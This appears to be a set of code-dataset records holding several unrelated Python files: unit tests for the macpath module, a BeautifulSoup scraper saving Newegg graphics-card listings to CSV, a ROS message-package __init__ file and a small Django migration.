"OpenSSL",
"Python-2.0",
"LicenseRef-scancode-newlib-historical",
"TCL",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | bouffalolab/bl_iot_sdk | bc5eaf036b70f8c65dd389439062b169f8d09daa | b90664de0bd4c1897a9f1f5d9e360a9631d38b34 | refs/heads/master | 2023-08-31T03:38:03.369853 | 2023-08-16T08:50:33 | 2023-08-18T09:13:27 | 307,347,250 | 244 | 101 | Apache-2.0 | 2023-08-28T06:29:02 | 2020-10-26T11:16:30 | C | UTF-8 | Python | false | false | 6,503 | py | from test import test_genericpath
import unittest
import warnings
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "the macpath module is deprecated",
DeprecationWarning)
import macpath
class MacPathTestCase(unittest.TestCase):
def test_abspath(self):
self.assertEqual(macpath.abspath("xx:yy"), "xx:yy")
def test_isabs(self):
isabs = macpath.isabs
self.assertTrue(isabs("xx:yy"))
self.assertTrue(isabs("xx:yy:"))
self.assertTrue(isabs("xx:"))
self.assertFalse(isabs("foo"))
self.assertFalse(isabs(":foo"))
self.assertFalse(isabs(":foo:bar"))
self.assertFalse(isabs(":foo:bar:"))
self.assertTrue(isabs(b"xx:yy"))
self.assertTrue(isabs(b"xx:yy:"))
self.assertTrue(isabs(b"xx:"))
self.assertFalse(isabs(b"foo"))
self.assertFalse(isabs(b":foo"))
self.assertFalse(isabs(b":foo:bar"))
self.assertFalse(isabs(b":foo:bar:"))
def test_split(self):
split = macpath.split
self.assertEqual(split("foo:bar"),
('foo:', 'bar'))
self.assertEqual(split("conky:mountpoint:foo:bar"),
('conky:mountpoint:foo', 'bar'))
self.assertEqual(split(":"), ('', ''))
self.assertEqual(split(":conky:mountpoint:"),
(':conky:mountpoint', ''))
self.assertEqual(split(b"foo:bar"),
(b'foo:', b'bar'))
self.assertEqual(split(b"conky:mountpoint:foo:bar"),
(b'conky:mountpoint:foo', b'bar'))
self.assertEqual(split(b":"), (b'', b''))
self.assertEqual(split(b":conky:mountpoint:"),
(b':conky:mountpoint', b''))
def test_join(self):
join = macpath.join
self.assertEqual(join('a', 'b'), ':a:b')
self.assertEqual(join(':a', 'b'), ':a:b')
self.assertEqual(join(':a:', 'b'), ':a:b')
self.assertEqual(join(':a::', 'b'), ':a::b')
self.assertEqual(join(':a', '::b'), ':a::b')
self.assertEqual(join('a', ':'), ':a:')
self.assertEqual(join('a:', ':'), 'a:')
self.assertEqual(join('a', ''), ':a:')
self.assertEqual(join('a:', ''), 'a:')
self.assertEqual(join('', ''), '')
self.assertEqual(join('', 'a:b'), 'a:b')
self.assertEqual(join('', 'a', 'b'), ':a:b')
self.assertEqual(join('a:b', 'c'), 'a:b:c')
self.assertEqual(join('a:b', ':c'), 'a:b:c')
self.assertEqual(join('a', ':b', ':c'), ':a:b:c')
self.assertEqual(join('a', 'b:'), 'b:')
self.assertEqual(join('a:', 'b:'), 'b:')
self.assertEqual(join(b'a', b'b'), b':a:b')
self.assertEqual(join(b':a', b'b'), b':a:b')
self.assertEqual(join(b':a:', b'b'), b':a:b')
self.assertEqual(join(b':a::', b'b'), b':a::b')
self.assertEqual(join(b':a', b'::b'), b':a::b')
self.assertEqual(join(b'a', b':'), b':a:')
self.assertEqual(join(b'a:', b':'), b'a:')
self.assertEqual(join(b'a', b''), b':a:')
self.assertEqual(join(b'a:', b''), b'a:')
self.assertEqual(join(b'', b''), b'')
self.assertEqual(join(b'', b'a:b'), b'a:b')
self.assertEqual(join(b'', b'a', b'b'), b':a:b')
self.assertEqual(join(b'a:b', b'c'), b'a:b:c')
self.assertEqual(join(b'a:b', b':c'), b'a:b:c')
self.assertEqual(join(b'a', b':b', b':c'), b':a:b:c')
self.assertEqual(join(b'a', b'b:'), b'b:')
self.assertEqual(join(b'a:', b'b:'), b'b:')
def test_splitext(self):
splitext = macpath.splitext
self.assertEqual(splitext(":foo.ext"), (':foo', '.ext'))
self.assertEqual(splitext("foo:foo.ext"), ('foo:foo', '.ext'))
self.assertEqual(splitext(".ext"), ('.ext', ''))
self.assertEqual(splitext("foo.ext:foo"), ('foo.ext:foo', ''))
self.assertEqual(splitext(":foo.ext:"), (':foo.ext:', ''))
self.assertEqual(splitext(""), ('', ''))
self.assertEqual(splitext("foo.bar.ext"), ('foo.bar', '.ext'))
self.assertEqual(splitext(b":foo.ext"), (b':foo', b'.ext'))
self.assertEqual(splitext(b"foo:foo.ext"), (b'foo:foo', b'.ext'))
self.assertEqual(splitext(b".ext"), (b'.ext', b''))
self.assertEqual(splitext(b"foo.ext:foo"), (b'foo.ext:foo', b''))
self.assertEqual(splitext(b":foo.ext:"), (b':foo.ext:', b''))
self.assertEqual(splitext(b""), (b'', b''))
self.assertEqual(splitext(b"foo.bar.ext"), (b'foo.bar', b'.ext'))
def test_ismount(self):
ismount = macpath.ismount
self.assertEqual(ismount("a:"), True)
self.assertEqual(ismount("a:b"), False)
self.assertEqual(ismount("a:b:"), True)
self.assertEqual(ismount(""), False)
self.assertEqual(ismount(":"), False)
self.assertEqual(ismount(b"a:"), True)
self.assertEqual(ismount(b"a:b"), False)
self.assertEqual(ismount(b"a:b:"), True)
self.assertEqual(ismount(b""), False)
self.assertEqual(ismount(b":"), False)
def test_normpath(self):
normpath = macpath.normpath
self.assertEqual(normpath("a:b"), "a:b")
self.assertEqual(normpath("a"), ":a")
self.assertEqual(normpath("a:b::c"), "a:c")
self.assertEqual(normpath("a:b:c:::d"), "a:d")
self.assertRaises(macpath.norm_error, normpath, "a::b")
self.assertRaises(macpath.norm_error, normpath, "a:b:::c")
self.assertEqual(normpath(":"), ":")
self.assertEqual(normpath("a:"), "a:")
self.assertEqual(normpath("a:b:"), "a:b")
self.assertEqual(normpath(b"a:b"), b"a:b")
self.assertEqual(normpath(b"a"), b":a")
self.assertEqual(normpath(b"a:b::c"), b"a:c")
self.assertEqual(normpath(b"a:b:c:::d"), b"a:d")
self.assertRaises(macpath.norm_error, normpath, b"a::b")
self.assertRaises(macpath.norm_error, normpath, b"a:b:::c")
self.assertEqual(normpath(b":"), b":")
self.assertEqual(normpath(b"a:"), b"a:")
self.assertEqual(normpath(b"a:b:"), b"a:b")
class MacCommonTest(test_genericpath.CommonTest, unittest.TestCase):
pathmodule = macpath
test_relpath_errors = None
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7cfa8bc5f3f464ee75f8482cc31e6b0550228649 | f73241e87cef9250d8e6a3648b23920dddccb19f | /Web Scrape.py | 85c7f9f0bceec54ec321a0cabcdd18b23c736d6e | [] | no_license | roshanpokhrel/webscrape | cf39c6826913c2e01490797e3a48943574eddcaf | 23f3e07b14bbd6ea5ee1b8d5f21e4a7b7b7b1657 | refs/heads/master | 2020-03-25T17:17:05.148421 | 2018-08-08T06:36:22 | 2018-08-08T06:36:22 | 143,971,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,370 | py | from urllib.request import urlopen as uReq
from bs4 import BeautifulSoup as soup
my_url = 'https://www.newegg.com/Video-Cards-Video-Devices/Category/ID-38?Tpk=graphics%20card'
# opening up a connection, grabbing the page
uClient = uReq(my_url)
# offloads contents into variable
page_html = uClient.read()
# close the connection
uClient.close()
# html parsing
page_soup = soup(page_html, "html.parser")
# print(page_soup.h1)
# print(page_soup.p)
# print(page_soup.body)
# Find all div that have the class item-container
containers = page_soup.findAll("div", {"class":"item-container"})
#print(len(container))
#print(container[0])
# Open a csv file to write to
filename = "products_name.csv"
f = open(filename, "w")
headers = "brand, product_name, shipping\n"
f.write(headers)
for container in containers:
brand = container.div.div.a.img["title"] #Who makes this graphics card
title_container = container.findAll("a", {"class":"item-title"})
product_name = title_container[0].text
shipping_container = container.findAll("li", {"class": "price-ship"})
shipping = shipping_container[0].text.strip() #strip to cut all whitespaces and other characters
f.write(brand + ',' + product_name.replace(",", "|") + ',' + shipping + '\n')
# print("My brand is:" + brand)
# print("My Product is:" + product_name)
# print("My shipping detail is:" + shipping)
f.close() | [
"[email protected]"
] | |
bdd85e097c2d83b1fa81fe61ddc8d6a2508d83d0 | fe9935b08e22fc019fbcfd6c0bc37ab235e2a0e2 | /catkin_ws/devel/lib/python3/dist-packages/suruiha_gazebo_plugins/msg/__init__.py | 47936db23aedbd75e93835ebb9ed84b9da5ba4b5 | [] | no_license | abdussametkaradeniz/RosLessonsAndTutorials | ce22a06d8a881d949479956ea6aa06ff9f8bf41b | 940597350f5ed85244696ec44fe567fd89a6d5d8 | refs/heads/main | 2023-07-18T22:56:52.075918 | 2021-09-07T21:42:24 | 2021-09-07T21:42:24 | 404,125,607 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | from ._UAVBattery import *
from ._UAVMessage import *
from ._UAVScore import *
from ._UAVSensorMessage import *
from ._UAVTracking import *
| [
"[email protected]"
] | |
ce0d6c9dabd06a703319e21717d1378c7980e8d9 | 9d35a44bd264258fc306c622e1097f637988638a | /shortnr/bookmarks/migrations/0004_auto_20160405_0334.py | 3def50627d8aed2a9864fbaa008a26134ef36c2f | [] | no_license | D4VEB/urly-bird | fca75ea8888895b6a84dff73a931007af45de0e6 | 906de245acd5cd45883928ffb415791efbd32c01 | refs/heads/master | 2021-01-12T20:00:30.126945 | 2016-04-07T20:13:35 | 2016-04-07T20:13:35 | 55,182,743 | 0 | 0 | null | 2016-03-31T21:02:19 | 2016-03-31T21:02:19 | null | UTF-8 | Python | false | false | 475 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-05 10:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookmarks', '0003_auto_20160405_0319'),
]
operations = [
migrations.AlterField(
model_name='bookmark',
name='pub_date',
field=models.DateTimeField(auto_now=True, db_index=True),
),
]
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.